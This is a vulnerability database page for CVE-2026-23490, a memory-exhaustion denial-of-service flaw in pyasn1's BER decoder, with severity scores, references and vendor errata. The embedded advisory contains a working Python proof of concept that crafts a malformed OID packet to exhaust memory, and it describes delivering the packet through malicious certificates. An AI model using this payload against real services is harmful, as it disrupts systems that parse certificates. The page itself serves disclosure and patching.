VulnerableCode Vulnerability Details

Staging Environment: Content and features may be unstable or change without notice.

Search for vulnerabilities

Vulnerability details: VCID-bptp-5gn6-eucd

Essentials
Severities (37)
References (50)
Severity details (23)
Exploits (0)
EPSS
History (1)

Vulnerability ID	VCID-bptp-5gn6-eucd
Aliases	CVE-2026-23490 GHSA-63vm-454h-vhhq
Summary	pyasn1 has a DoS vulnerability in decoder ### Summary After reviewing pyasn1 v0.6.1 a Denial-of-Service issue has been found that leads to memory exhaustion from malformed RELATIVE-OID with excessive continuation octets. ### Details The integer issue can be found in the decoder as `reloid += ((subId << 7) + nextSubId,)`: https://github.com/pyasn1/pyasn1/blob/main/pyasn1/codec/ber/decoder.py#L496 ### PoC For the DoS: ```py import pyasn1.codec.ber.decoder as decoder import pyasn1.type.univ as univ import sys import resource # Deliberately set memory limit to display PoC try: resource.setrlimit(resource.RLIMIT_AS, (10010241024, 10010241024)) print("[] Memory limit set to 100MB") except: print("[-] Could not set memory limit") # Test with different payload sizes to find the DoS threshold payload_size_mb = int(sys.argv[1]) print(f"[] Testing with {payload_size_mb}MB payload...") payload_size = payload_size_mb * 1024 * 1024 # Create payload with continuation octets # Each 0x81 byte indicates continuation, causing bit shifting in decoder payload = b'\x81' * payload_size + b'\x00' length = len(payload) # DER length encoding (supports up to 4GB) if length < 128: length_bytes = bytes([length]) elif length < 256: length_bytes = b'\x81' + length.to_bytes(1, 'big') elif length < 2562: length_bytes = b'\x82' + length.to_bytes(2, 'big') elif length < 2563: length_bytes = b'\x83' + length.to_bytes(3, 'big') else: # 4 bytes can handle up to 4GB length_bytes = b'\x84' + length.to_bytes(4, 'big') # Use OID (0x06) for more aggressive parsing malicious_packet = b'\x06' + length_bytes + payload print(f"[] Packet size: {len(malicious_packet) / 1024 / 1024:.1f} MB") try: print("[] Decoding (this may take time or exhaust memory)...") result = decoder.decode(malicious_packet, asn1Spec=univ.ObjectIdentifier()) print(f'[+] Decoded successfully') print(f'[!] Object size: {sys.getsizeof(result[0])} bytes') # Try to convert to string print('[] Converting to string...') try: str_result = str(result[0]) print(f'[+] String succeeded: {len(str_result)} chars') if len(str_result) > 10000: print(f'[!] MEMORY EXPLOSION: {len(str_result)} character string!') except MemoryError: print(f'[-] MemoryError during string conversion!') except Exception as e: print(f'[-] {type(e).__name__} during string conversion') except MemoryError: print('[-] MemoryError: Out of memory!') except Exception as e: print(f'[-] Error: {type(e).__name__}: {e}') print("\n[] Test completed") ``` Screenshots with the results: #### DoS <img width="944" height="207" alt="Screenshot_20251219_160840" src="https://github.com/user-attachments/assets/68b9566b-5ee1-47b0-a269-605b037dfc4f" /> <img width="931" height="231" alt="Screenshot_20251219_152815" src="https://github.com/user-attachments/assets/62eacf4f-eb31-4fba-b7a8-e8151484a9fa" /> #### Leak analysis A potential heap leak was investigated but came back clean: ``` [] Creating 1000KB payload... [] Decoding with pyasn1... [] Materializing to string... [+] Decoded 2157784 characters [+] Binary representation: 896001 bytes [+] Dumped to heap_dump.bin [] First 64 bytes (hex): 01020408102040810204081020408102040810204081020408102040810204081020408102040810204081020408102040810204081020408102040810204081 [] First 64 bytes (ASCII/hex dump): 0000: 01 02 04 08 10 20 40 81 02 04 08 10 20 40 81 02 ..... @..... @.. 0010: 04 08 10 20 40 81 02 04 08 10 20 40 81 02 04 08 ... @..... @.... 0020: 10 20 40 81 02 04 08 10 20 40 81 02 04 08 10 20 . @..... @..... 0030: 40 81 02 04 08 10 20 40 81 02 04 08 10 20 40 81 @..... @..... @. [] Digit distribution analysis: '0': 10.1% '1': 9.9% '2': 10.0% '3': 9.9% '4': 9.9% '5': 10.0% '6': 10.0% '7': 10.0% '8': 9.9% '9': 10.1% ``` ### Scenario 1. An attacker creates a malicious X.509 certificate. 2. The application validates certificates. 3. The application accepts the malicious certificate and tries decoding resulting in the issues mentioned above. ### Impact This issue can affect resource consumption and hang systems or stop services. This may affect: - LDAP servers - TLS/SSL endpoints - OCSP responders - etc. ### Recommendation Add a limit to the allowed bytes in the decoder.
Status	Published
Exploitability	0.5
Weighted Severity	8.0
Risk	4.0
Affected and Fixed Packages	Package Details

Weaknesses (4)

CWE-400	Uncontrolled Resource Consumption
CWE-770	Allocation of Resources Without Limits or Throttling
CWE-937	OWASP Top Ten 2013 Category A9 - Using Components with Known Vulnerabilities
CWE-1035	OWASP Top Ten 2017 Category A9 - Using Components with Known Vulnerabilities

System	Score	Found at
cvssv3	7.5	https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2026-23490.json
epss	0.00021	https://api.first.org/data/v1/epss?cve=CVE-2026-23490
epss	0.00021	https://api.first.org/data/v1/epss?cve=CVE-2026-23490
epss	0.00021	https://api.first.org/data/v1/epss?cve=CVE-2026-23490
epss	0.00021	https://api.first.org/data/v1/epss?cve=CVE-2026-23490
epss	0.00021	https://api.first.org/data/v1/epss?cve=CVE-2026-23490
epss	0.00021	https://api.first.org/data/v1/epss?cve=CVE-2026-23490
epss	0.00021	https://api.first.org/data/v1/epss?cve=CVE-2026-23490
epss	0.00021	https://api.first.org/data/v1/epss?cve=CVE-2026-23490
epss	0.00021	https://api.first.org/data/v1/epss?cve=CVE-2026-23490
epss	0.00021	https://api.first.org/data/v1/epss?cve=CVE-2026-23490
epss	0.00021	https://api.first.org/data/v1/epss?cve=CVE-2026-23490
epss	0.00021	https://api.first.org/data/v1/epss?cve=CVE-2026-23490
epss	0.00021	https://api.first.org/data/v1/epss?cve=CVE-2026-23490
epss	0.00021	https://api.first.org/data/v1/epss?cve=CVE-2026-23490
cvssv3.1	7.5	https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml
cvssv3.1_qr	HIGH	https://github.com/advisories/GHSA-63vm-454h-vhhq
cvssv3.1	7.5	https://github.com/pyasn1/pyasn1
generic_textual	HIGH	https://github.com/pyasn1/pyasn1
cvssv3.1	7.5	https://github.com/pyasn1/pyasn1/blob/0f07d7242a78ab4d129b26256d7474f7168cf536/pyasn1/codec/ber/decoder.py#L496
generic_textual	HIGH	https://github.com/pyasn1/pyasn1/blob/0f07d7242a78ab4d129b26256d7474f7168cf536/pyasn1/codec/ber/decoder.py#L496
cvssv3.1	7.5	https://github.com/pyasn1/pyasn1/commit/3908f144229eed4df24bd569d16e5991ace44970
generic_textual	HIGH	https://github.com/pyasn1/pyasn1/commit/3908f144229eed4df24bd569d16e5991ace44970
ssvc	Track	https://github.com/pyasn1/pyasn1/commit/3908f144229eed4df24bd569d16e5991ace44970
cvssv3.1	7.5	https://github.com/pyasn1/pyasn1/commit/be353d755f42ea36539b4f5053c652ddf56979a6
generic_textual	HIGH	https://github.com/pyasn1/pyasn1/commit/be353d755f42ea36539b4f5053c652ddf56979a6
cvssv3.1	7.5	https://github.com/pyasn1/pyasn1/releases/tag/v0.6.2
generic_textual	HIGH	https://github.com/pyasn1/pyasn1/releases/tag/v0.6.2
ssvc	Track	https://github.com/pyasn1/pyasn1/releases/tag/v0.6.2
cvssv3.1	7.5	https://github.com/pyasn1/pyasn1/security/advisories/GHSA-63vm-454h-vhhq
cvssv3.1_qr	HIGH	https://github.com/pyasn1/pyasn1/security/advisories/GHSA-63vm-454h-vhhq
generic_textual	HIGH	https://github.com/pyasn1/pyasn1/security/advisories/GHSA-63vm-454h-vhhq
ssvc	Track	https://github.com/pyasn1/pyasn1/security/advisories/GHSA-63vm-454h-vhhq
cvssv3.1	7.5	https://lists.debian.org/debian-lts-announce/2026/02/msg00002.html
generic_textual	HIGH	https://lists.debian.org/debian-lts-announce/2026/02/msg00002.html
cvssv3.1	7.5	https://nvd.nist.gov/vuln/detail/CVE-2026-23490
generic_textual	HIGH	https://nvd.nist.gov/vuln/detail/CVE-2026-23490

Reference id	Reference type	URL
		https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2026-23490.json
		https://api.first.org/data/v1/epss?cve=CVE-2026-23490
		https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-23490
		https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml
		https://github.com/pyasn1/pyasn1
		https://github.com/pyasn1/pyasn1/blob/0f07d7242a78ab4d129b26256d7474f7168cf536/pyasn1/codec/ber/decoder.py#L496
		https://github.com/pyasn1/pyasn1/commit/3908f144229eed4df24bd569d16e5991ace44970
		https://github.com/pyasn1/pyasn1/commit/be353d755f42ea36539b4f5053c652ddf56979a6
		https://github.com/pyasn1/pyasn1/releases/tag/v0.6.2
		https://github.com/pyasn1/pyasn1/security/advisories/GHSA-63vm-454h-vhhq
		https://lists.debian.org/debian-lts-announce/2026/02/msg00002.html
		https://nvd.nist.gov/vuln/detail/CVE-2026-23490
1125753		https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1125753
2430472		https://bugzilla.redhat.com/show_bug.cgi?id=2430472
GHSA-63vm-454h-vhhq		https://github.com/advisories/GHSA-63vm-454h-vhhq
RHSA-2026:1903		https://access.redhat.com/errata/RHSA-2026:1903
RHSA-2026:1904		https://access.redhat.com/errata/RHSA-2026:1904
RHSA-2026:1905		https://access.redhat.com/errata/RHSA-2026:1905
RHSA-2026:1906		https://access.redhat.com/errata/RHSA-2026:1906
RHSA-2026:2221		https://access.redhat.com/errata/RHSA-2026:2221
RHSA-2026:2299		https://access.redhat.com/errata/RHSA-2026:2299
RHSA-2026:2300		https://access.redhat.com/errata/RHSA-2026:2300
RHSA-2026:2302		https://access.redhat.com/errata/RHSA-2026:2302
RHSA-2026:2303		https://access.redhat.com/errata/RHSA-2026:2303
RHSA-2026:2309		https://access.redhat.com/errata/RHSA-2026:2309
RHSA-2026:2453		https://access.redhat.com/errata/RHSA-2026:2453
RHSA-2026:2460		https://access.redhat.com/errata/RHSA-2026:2460
RHSA-2026:2483		https://access.redhat.com/errata/RHSA-2026:2483
RHSA-2026:2486		https://access.redhat.com/errata/RHSA-2026:2486
RHSA-2026:2712		https://access.redhat.com/errata/RHSA-2026:2712
RHSA-2026:2758		https://access.redhat.com/errata/RHSA-2026:2758
RHSA-2026:3354		https://access.redhat.com/errata/RHSA-2026:3354
RHSA-2026:3359		https://access.redhat.com/errata/RHSA-2026:3359
RHSA-2026:3958		https://access.redhat.com/errata/RHSA-2026:3958
RHSA-2026:3959		https://access.redhat.com/errata/RHSA-2026:3959
RHSA-2026:4138		https://access.redhat.com/errata/RHSA-2026:4138
RHSA-2026:4139		https://access.redhat.com/errata/RHSA-2026:4139
RHSA-2026:4140		https://access.redhat.com/errata/RHSA-2026:4140
RHSA-2026:4141		https://access.redhat.com/errata/RHSA-2026:4141
RHSA-2026:4142		https://access.redhat.com/errata/RHSA-2026:4142
RHSA-2026:4143		https://access.redhat.com/errata/RHSA-2026:4143
RHSA-2026:4144		https://access.redhat.com/errata/RHSA-2026:4144
RHSA-2026:4145		https://access.redhat.com/errata/RHSA-2026:4145
RHSA-2026:4146		https://access.redhat.com/errata/RHSA-2026:4146
RHSA-2026:4147		https://access.redhat.com/errata/RHSA-2026:4147
RHSA-2026:4148		https://access.redhat.com/errata/RHSA-2026:4148
RHSA-2026:4943		https://access.redhat.com/errata/RHSA-2026:4943
RHSA-2026:5606		https://access.redhat.com/errata/RHSA-2026:5606
USN-7975-1		https://usn.ubuntu.com/7975-1/
USN-8134-1		https://usn.ubuntu.com/8134-1/

No exploits are available.

Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H Found at https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2026-23490.json

Attack Vector (AV)	Attack Complexity (AC)	Privileges Required (PR)	User Interaction (UI)	Scope (S)	Confidentiality Impact (C)	Integrity Impact (I)	Availability Impact (A)
network adjacent_network local physical	low high	none low high	none required	unchanged changed	high low none	high low none	high low none

Attack Vector (AV)

Attack Complexity (AC)

Privileges Required (PR)

User Interaction (UI)

Scope (S)

Confidentiality Impact (C)

Integrity Impact (I)

Availability Impact (A)

network

adjacent_network

local

physical

low

high

none

low

high

none

required

unchanged

changed

high

low

none

high

low

none

high

low

none

Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H Found at https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml

Attack Vector (AV)	Attack Complexity (AC)	Privileges Required (PR)	User Interaction (UI)	Scope (S)	Confidentiality Impact (C)	Integrity Impact (I)	Availability Impact (A)
network adjacent_network local physical	low high	none low high	none required	unchanged changed	high low none	high low none	high low none

Attack Vector (AV)

Attack Complexity (AC)

Privileges Required (PR)

User Interaction (UI)

Scope (S)

Confidentiality Impact (C)

Integrity Impact (I)

Availability Impact (A)

network

adjacent_network

local

physical

low

high

none

low

high

none

required

unchanged

changed

high

low

none

high

low

none

high

low

none

Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H Found at https://github.com/pyasn1/pyasn1

Attack Vector (AV)	Attack Complexity (AC)	Privileges Required (PR)	User Interaction (UI)	Scope (S)	Confidentiality Impact (C)	Integrity Impact (I)	Availability Impact (A)
network adjacent_network local physical	low high	none low high	none required	unchanged changed	high low none	high low none	high low none

Attack Vector (AV)

Attack Complexity (AC)

Privileges Required (PR)

User Interaction (UI)

Scope (S)

Confidentiality Impact (C)

Integrity Impact (I)

Availability Impact (A)

network

adjacent_network

local

physical

low

high

none

low

high

none

required

unchanged

changed

high

low

none

high

low

none

high

low

none

Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H Found at https://github.com/pyasn1/pyasn1/blob/0f07d7242a78ab4d129b26256d7474f7168cf536/pyasn1/codec/ber/decoder.py#L496

Attack Vector (AV)	Attack Complexity (AC)	Privileges Required (PR)	User Interaction (UI)	Scope (S)	Confidentiality Impact (C)	Integrity Impact (I)	Availability Impact (A)
network adjacent_network local physical	low high	none low high	none required	unchanged changed	high low none	high low none	high low none

Attack Vector (AV)

Attack Complexity (AC)

Privileges Required (PR)

User Interaction (UI)

Scope (S)

Confidentiality Impact (C)

Integrity Impact (I)

Availability Impact (A)

network

adjacent_network

local

physical

low

high

none

low

high

none

required

unchanged

changed

high

low

none

high

low

none

high

low

none

Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H Found at https://github.com/pyasn1/pyasn1/commit/3908f144229eed4df24bd569d16e5991ace44970

Attack Vector (AV)	Attack Complexity (AC)	Privileges Required (PR)	User Interaction (UI)	Scope (S)	Confidentiality Impact (C)	Integrity Impact (I)	Availability Impact (A)
network adjacent_network local physical	low high	none low high	none required	unchanged changed	high low none	high low none	high low none

Attack Vector (AV)

Attack Complexity (AC)

Privileges Required (PR)

User Interaction (UI)

Scope (S)

Confidentiality Impact (C)

Integrity Impact (I)

Availability Impact (A)

network

adjacent_network

local

physical

low

high

none

low

high

none

required

unchanged

changed

high

low

none

high

low

none

high

low

none

Vector: SSVCv2/E:P/A:Y/T:P/P:M/B:A/M:M/D:T/2026-01-16T19:23:28Z/ Found at https://github.com/pyasn1/pyasn1/commit/3908f144229eed4df24bd569d16e5991ace44970

Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H Found at https://github.com/pyasn1/pyasn1/commit/be353d755f42ea36539b4f5053c652ddf56979a6

Attack Vector (AV)	Attack Complexity (AC)	Privileges Required (PR)	User Interaction (UI)	Scope (S)	Confidentiality Impact (C)	Integrity Impact (I)	Availability Impact (A)
network adjacent_network local physical	low high	none low high	none required	unchanged changed	high low none	high low none	high low none

Attack Vector (AV)

Attack Complexity (AC)

Privileges Required (PR)

User Interaction (UI)

Scope (S)

Confidentiality Impact (C)

Integrity Impact (I)

Availability Impact (A)

network

adjacent_network

local

physical

low

high

none

low

high

none

required

unchanged

changed

high

low

none

high

low

none

high

low

none

Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H Found at https://github.com/pyasn1/pyasn1/releases/tag/v0.6.2

Attack Vector (AV)	Attack Complexity (AC)	Privileges Required (PR)	User Interaction (UI)	Scope (S)	Confidentiality Impact (C)	Integrity Impact (I)	Availability Impact (A)
network adjacent_network local physical	low high	none low high	none required	unchanged changed	high low none	high low none	high low none

Attack Vector (AV)

Attack Complexity (AC)

Privileges Required (PR)

User Interaction (UI)

Scope (S)

Confidentiality Impact (C)

Integrity Impact (I)

Availability Impact (A)

network

adjacent_network

local

physical

low

high

none

low

high

none

required

unchanged

changed

high

low

none

high

low

none

high

low

none

Vector: SSVCv2/E:P/A:Y/T:P/P:M/B:A/M:M/D:T/2026-01-16T19:23:28Z/ Found at https://github.com/pyasn1/pyasn1/releases/tag/v0.6.2

Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H Found at https://github.com/pyasn1/pyasn1/security/advisories/GHSA-63vm-454h-vhhq

Attack Vector (AV)	Attack Complexity (AC)	Privileges Required (PR)	User Interaction (UI)	Scope (S)	Confidentiality Impact (C)	Integrity Impact (I)	Availability Impact (A)
network adjacent_network local physical	low high	none low high	none required	unchanged changed	high low none	high low none	high low none

Attack Vector (AV)

Attack Complexity (AC)

Privileges Required (PR)

User Interaction (UI)

Scope (S)

Confidentiality Impact (C)

Integrity Impact (I)

Availability Impact (A)

network

adjacent_network

local

physical

low

high

none

low

high

none

required

unchanged

changed

high

low

none

high

low

none

high

low

none

Vector: SSVCv2/E:P/A:Y/T:P/P:M/B:A/M:M/D:T/2026-01-16T19:23:28Z/ Found at https://github.com/pyasn1/pyasn1/security/advisories/GHSA-63vm-454h-vhhq

Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H Found at https://lists.debian.org/debian-lts-announce/2026/02/msg00002.html

Attack Vector (AV)	Attack Complexity (AC)	Privileges Required (PR)	User Interaction (UI)	Scope (S)	Confidentiality Impact (C)	Integrity Impact (I)	Availability Impact (A)
network adjacent_network local physical	low high	none low high	none required	unchanged changed	high low none	high low none	high low none

Attack Vector (AV)

Attack Complexity (AC)

Privileges Required (PR)

User Interaction (UI)

Scope (S)

Confidentiality Impact (C)

Integrity Impact (I)

Availability Impact (A)

network

adjacent_network

local

physical

low

high

none

low

high

none

required

unchanged

changed

high

low

none

high

low

none

high

low

none

Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H Found at https://nvd.nist.gov/vuln/detail/CVE-2026-23490

Attack Vector (AV)	Attack Complexity (AC)	Privileges Required (PR)	User Interaction (UI)	Scope (S)	Confidentiality Impact (C)	Integrity Impact (I)	Availability Impact (A)
network adjacent_network local physical	low high	none low high	none required	unchanged changed	high low none	high low none	high low none

Attack Vector (AV)

Attack Complexity (AC)

Privileges Required (PR)

User Interaction (UI)

Scope (S)

Confidentiality Impact (C)

Integrity Impact (I)

Availability Impact (A)

network

adjacent_network

local

physical

low

high

none

low

high

none

required

unchanged

changed

high

low

none

high

low

none

high

low

none

Exploit Prediction Scoring System (EPSS)

Percentile	0.05618
EPSS Score	0.00021
Published At	April 2, 2026, 12:55 p.m.

Date	Actor	Action	Source	VulnerableCode Version
2026-04-01T12:52:15.688778+00:00	GithubOSV Importer	Import	https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2026/01/GHSA-63vm-454h-vhhq/GHSA-63vm-454h-vhhq.json	38.0.0